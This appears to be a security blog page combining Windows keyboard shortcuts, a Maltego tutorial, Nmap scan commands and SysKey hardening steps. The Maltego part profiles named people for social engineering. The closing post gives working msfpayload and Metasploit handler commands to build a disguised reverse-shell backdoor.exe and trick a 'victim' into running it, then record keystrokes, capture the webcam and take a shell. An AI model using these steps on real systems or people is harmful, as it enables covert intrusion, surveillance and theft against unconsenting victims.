CTRL+O (Open a saved console)
CTRL+N (Open a new console)
CTRL+S (Save the open console)
CTRL+M (Add or remove a console item)
CTRL+W (Close window/tab)
F5 key (Update the content of all console windows)
Alt+Spacebar (Display the MMC window menu)
Alt+F4 (Close the console)
Alt+A (Display the Action menu)
Alt+V (Display the View menu)
Alt+F (Display the File menu)
Alt+O (Display the Favorites menu)
MMC Console Window Keyboard Shortcuts:
CTRL+P (Print the current page or active pane)
Alt+- (Display the window menu for the active console window)
Shift+F10 (Display the Action shortcut menu for the selected item)
F1 key (Open the Help topic, if any, for the selected item)
F5 key (Update the content of all console windows)
CTRL+F10 (Maximize the active console window)
CTRL+F5 (Restore the active console window)
Alt+Enter (Display the Properties dialog box, if any, for the selected item)
F2 key (Rename the selected item)
CTRL+F4 (Close the active console window. When a console has only one console window, this shortcut closes the console)
Remote Desktop Connection Navigation:
CTRL+Alt+END (Open the m*cro$oft Windows NT Security dialog box)
Alt+PAGE UP (Switch between programs from left to right)
Alt+PAGE DOWN (Switch between programs from right to left)
Alt+INSERT (Cycle through the programs in most recently used order)
Alt+HOME (Display the Start menu)
CTRL+Alt+BREAK (Switch the client computer between a window and a full screen)
Alt+Delete (Display the Windows menu)
CTRL+Alt+- (Place a snapshot of the active window in the client on the Terminal server clipboard and provide the same functionality as pressing PRINT SCREEN on a local computer.)
CTRL+Alt++ (Place a snapshot of the entire client window area on the Terminal server clipboard and provide the same functionality as pressing Alt+PRINT SCREEN on a local computer.)
Internet Explorer Navigation:
CTRL+B (Open the Organize Favorites dialog box)
CTRL+E (Open the Search bar)
CTRL+F (Start the Find utility)
CTRL+H (Open the History bar)
CTRL+I (Open the Favorites bar)
CTRL+L (Open the Open dialog box)
CTRL+N (Start another instance of the browser with the same Web address)
CTRL+O (Open the Open dialog box, the same as CTRL+L)
CTRL+P (Open the Print dialog box)
CTRL+R (Update the current Web page)
CTRL+W (Close the current window)

Wednesday 7 May 2014

Information Gathering Using Maltego


The first phase in security assessment is to focus on collecting as much information as possible about a target application.

According to OWASP, information gathering is a necessary step of a penetration test.
Information gathering is generally done on infrastructure and on people. In infrastructure recon, the attackers generally try to find the information about the host i.e., the mail exchanger record, name server record , shared resources, etc.,. For information gathering on people, the attackers try to gather information like email addresses, their public profiles, files publicly uploaded, etc., that can be used for performing a brute force, social engineering or Spear phishing.

What information can be found using Maltego:

With Maltego, we can find the relationships, which (people) are linked to, including their social profile, mutual friends, companies that are related to the information gathered, and websites.


If we want to gather information related to any infrastructure, we can gather relationship between domains, DNS names, and net blocks.

Architecture of Maltego:

The Maltego client sends the request to seed servers in XML format over HTTPS. The request from the seed server is given to the TAS servers which are passed on to the service providers. The request results are given back to the Maltego client. The advantage is that we can have our own TAS servers for more privacy. Currently Maltego has two types of server modules: professional and basic. The major differences between the two servers are the modules available. The professional server comes with CTAS, SQLTAS and the PTTAS and the basic server comes with CTAS

Starting Maltego:

First go to Applications–>Backtrack–>Information Gathering–>Network Analysis–>DNS Analysis–>Maltego


The first time you login it will ask you to register your product. If you already have an account just enter your email ID and password. Once you validate your login it will update the transforms.


Once the transforms are updated, click the ‘Investigate’ tab and select the desired option from the palette. There are two main categories in the palette: Infrastructure and Personal. We can also import other entities to the palette. An example is the SHODAN entity. SHODAN is a search engine which can be used to find specific information like server, routers, switches, etc .,with the help of their banner.






















Infrastructure Reconnaissance:

Maltego helps to gather a lot of information about the infrastructure. In order to start gathering information, select the desired entity from the palette. In this example, we are going to scan a domain. Select the domain option from the palette and drag the option to the workspace. Enter the target domain. Now right-click on the entity and you should be getting an window that says “Run Transform” with additional relevant options.


Run the required transform and find out information like the MX, NS and IP address. We can then use transforms like ‘IPAddressToNetblock’ to break a large netblock into smaller networks for better understanding.

Also we can find the shared domains. We can determine information like IP addresses for domains and other internal networks, the netblocks which are used by the target, etc.




Infrastructure Info gathering
Personal Reconnaissance:

Maltego helps you find information about a person, like their email address, social profiles, mutual friends, various files shared on various URLs, etc. Select the desired option from the palette. Here I am going to select the option ‘Person’ and will enter the name of the person I will be trying to gather information about.


Right-click on the ‘Person’ option and select the desired transforms. First let’s find the email address related to the person and try to gather more information. With Maltego, we can find their SNS information from Facebook, Flickr, etc

Person Info Gathering

Various entities in Facebook were detected by using the transform “toFacebookaffiliation.” This method generally looks for a Facebook affiliation that matches closely to a person’s name based on the first and last name and weighs each result accordingly. With Maltego we can also find mutual friends of two targeted persons in order to gather more information.

Similarly, we can find if the user has uploaded any files in pastebin or any other public URLs. Having all this information can be useful for performing a social engineering-based attack.
Download Link:(Windows)
http://www.paterva.com/web6/products/download.php

Tuesday 6 May 2014

Nmap Port Scanner Tool

Top 15 Nmap Command Examples For Sys/Network Admins


Nmap ("Network Mapper") is an open source tool for network exploration and security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. While Nmap is commonly used for security audits, many systems and network administrators find it useful for routine tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime.

#1: Scan a single host or an IP address (IPv4)
### Scan a single ip address ###
nmap 192.168.1.1
## Scan a host name ###
nmap server1.ethax.blogspot.in
## Scan a host name with more info###
nmap -v server1.ethax.blogspot.in


#2: Scan multiple IP address or subnet (IPv4)

nmap 192.168.1.1 192.168.1.2 192.168.1.3
## works with same subnet i.e. 192.168.1.0/24

nmap 192.168.1.1,2,3
You can scan a range of IP address too:

nmap 192.168.1.1-20
You can scan a range of IP address using a wildcard:

nmap 192.168.1.*
Finally, you scan an entire subnet:

nmap 192.168.1.0/24

#3: Read list of hosts/networks from a file (IPv4)

The -iL option allows you to read the list of target systems using a text file. This is useful to scan a large number of hosts/networks. Create a text file as follows:
cat > /tmp/test.txt

Sample outputs:

server1.cyberciti.biz
192.168.1.0/24
192.168.1.1/24
10.1.2.3
localhost
The syntax is:

nmap -iL /tmp/test.txt
#4: Excluding hosts/networks (IPv4)

When scanning a large number of hosts/networks you can exclude hosts from a scan:

nmap 192.168.1.0/24 --exclude 192.168.1.5
nmap 192.168.1.0/24 --exclude 192.168.1.5,192.168.1.254
OR exclude list from a file called /tmp/exclude.txt

nmap -iL /tmp/scanlist.txt --excludefile /tmp/exclude.txt
#5: Turn on OS and version detection scanning script (IPv4)

nmap -A 192.168.1.254
nmap -v -A 192.168.1.1
nmap -A -iL /tmp/scanlist.txt 
#6: Find out if a host/network is protected by a firewall

nmap -sA 192.168.1.254
nmap -sA server1.ethax.blogspot.in
#7: Scan a host when protected by the firewall

nmap -PN 192.168.1.1
nmap -PN server1.ethax.blogspot.in
#8: Scan an IPv6 host/address

The -6 option enable IPv6 scanning. The syntax is:

nmap -6 IPv6-Address-Here
nmap -6 server1.ethax.blogspot.in
nmap -6 2607:f0d0:1002:51::4
nmap -v A -6 2607:f0d0:1002:51::4
#9: Scan a network and find out which servers and devices are up and running

This is known as host discovery or ping scan:

nmap -sP 192.168.1.0/24
Sample outputs:

Host 192.168.1.1 is up (0.00035s latency).
MAC Address: BC:AE:C5:C3:16:93 (Unknown)
Host 192.168.1.2 is up (0.0038s latency).
MAC Address: 74:44:01:40:57:FB (Unknown)
Host 192.168.1.5 is up.
Host nas03 (192.168.1.12) is up (0.0091s latency).
MAC Address: 00:11:32:11:15:FC (Synology Incorporated)
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.80 second
#10: How do I perform a fast scan?

nmap -F 192.168.1.1
#11: Display the reason a port is in a particular state

nmap --reason 192.168.1.1
nmap --reason server1.ethax.blogspot.in
#12: Only show open (or possibly open) ports

nmap --open 192.168.1.1
nmap --open server1.ethax.blogspot.in
#13: Show all packets sent and received

nmap --packet-trace 192.168.1.1
nmap --packet-trace server1.ethax.blogspot.in
14#: Show host interfaces and routes

This is useful for debugging (ip command or route command or netstat command like output using nmap)

nmap --iflist

Sample outputs:

Starting Nmap 5.00 ( http://nmap.org ) at 2012-11-27 02:01 IST
************************INTERFACES************************
DEV           (SHORT)       IP/MASK                 TYPE          UP     MAC
lo                 (lo)                127.0.0.1/8              loopback     up
eth0             (eth0)            192.168.1.5/24        ethernet         up      B8:AC:6F:65:31:E5
vmnet1        (vmnet1)         192.168.121.1/24    ethernet         up      00:50:56:C0:00:01
vmnet8        (vmnet8)         192.168.179.1/24    ethernet         up      00:50:56:C0:00:08
ppp0           (ppp0)            10.1.19.69/32          point2point    up
**************************ROUTES**************************
DST/MASK           DEV        GATEWAY
10.0.31.178/32       ppp0
209.133.67.35/32   eth0         192.168.1.2
192.168.1.0/0         eth0
192.168.121.0/0     vmnet1
192.168.179.0/0     vmnet8
169.254.0.0/0         eth0
10.0.0.0/0               ppp0
0.0.0.0/0                 eth0          192.168.1.2

 #15: How do I scan specific ports?

map -p [port] hostName
## Scan port 80
nmap -p 80 192.168.1.1
## Scan TCP port 80
nmap -p T:80 192.168.1.1
## Scan UDP port 53
nmap -p U:53 192.168.1.1
## Scan two ports ##
nmap -p 80,443 192.168.1.1
## Scan port ranges ##
nmap -p 80-200 192.168.1.1
## Combine all options ##
nmap -p U:53,111,137,T:21-25,80,139,8080 192.168.1.1
nmap -p U:53,111,137,T:21-25,80,139,8080 server1.ethax.blogspot.in
nmap -v -sU -sT -p U:53,111,137,T:21-25,80,139,8080 192.168.1.254
## Scan all ports with * wildcard ##
nmap -p "*" 192.168.1.1
## Scan top ports i.e. scan $number most common ports ##
nmap --top-ports 5 192.168.1.1
nmap --top-ports 10 192.168.1.1
Sample outputs:

Starting Nmap 5.00 ( http://nmap.org ) at 2012-11-27 01:23 IST
Interesting ports on 192.168.1.1:
PORT     STATE  SERVICE
21/tcp   closed ftp
22/tcp   open   ssh
23/tcp   closed telnet
25/tcp   closed smtp
80/tcp   open   http
110/tcp  closed pop3
139/tcp  closed netbios-ssn
443/tcp  closed https
445/tcp  closed microsoft-ds
3389/tcp closed ms-term-serv
MAC Address: BC:AE:C5:C3:16:93 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 0.51 seconds

How to use the SysKey utility to secure the Windows Security Accounts Manager database



To Configure Windows System Key Protection, follow these steps:

At a command prompt, type syskey, and then press ENTER.
In the Securing the Windows Account Database dialog box, note that the Encryption Enabled option is selected and is the only option available. When this option is selected, Windows will always encrypt the SAM database.
Click Update.
Click Password Startup if you want to require a password to start Windows. Use a complex password that contains a combination of upper case and lower case letters, numbers, and symbols. The startup password must be at least 12 characters long and can be up to 128 characters long.

Note If you must remotely restart a computer that requires a password (if you use the Password Startup option), a person must be at the local console during the restart. Use this option only if a trusted security administrator will be available to type the Startup password.
Click System Generated Password if you do not want to require a startup password.

Select either of the following options:
Click Store Startup Key on Floppy Disk to store the system startup password on a floppy disk. This requires that someone insert the floppy disk to start the operating system.
Click Store Startup Key Locally to store the encryption key on the hard disk of the local computer. This is the default option.
Click OK two times to complete the procedure.

Remove the SAM encryption key from the local hard disk by using the Store Startup Key on Floppy Disk option for optimum security. This provides the highest level of protection for the SAM database.

Always create a back-up floppy disk if you use the Store Startup Key on Floppy Disk option. You can restart the system remotely if someone is available to insert the floppy disk into the computer when it restarts.

Note The Microsoft Windows NT 4.0 SAM database was not encrypted by default. You can encrypt the Windows NT 4.0 SAM database by using the SysKey utility.

HACK ANY WINDOWS 7 WITH METASPLOIT

In this tutorial i will exploit a Windows 7 Sp1 OS using Metasploit. i will be using the exploit/multi/handler module which “provides all of the features of the Metasploit payload system to exploits that have been launched  outside of the framework“
Before we fire up Metasploit, we need to create a payload in order to gain a meterpreter shell. To create a payload type this in the terminal without the quotes:
msfpayload windows/meterpreter/reverse_tcp LHOST=”your Local IP” LPORT=”listening port” x > /root/backdoor.exe

I used port 4444 (you can choose your own port) for the LPORT which is the listening port and set the LHOST to the IP of the remote attacker which is obviously your Local IP address, my IP is 192.168.10.5.

After that, you should be able to see a file named as backdoor.exe in /root. Send the file to the victim by using your Social Engineering skills and let him click the file. You can change the name of the file so that it is not that obvious.
Launch Metasploit and set the exploit by typing these commands in your msfconsole:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.10.5
set lport 4444
exploit

If all goes well, you should be able to establish a meterpreter session. Typesysinfo to gather some info on the machine. To know other commands for the meterpreter type help. There are also other meterpreter commands like capturing the screenshot of the PC, record keystrokes, capture a snapshot from a webcam, etc. To enter the command shell of the machine, type shell.
it,s cool to take a screenshot with meterpreter command screenshot.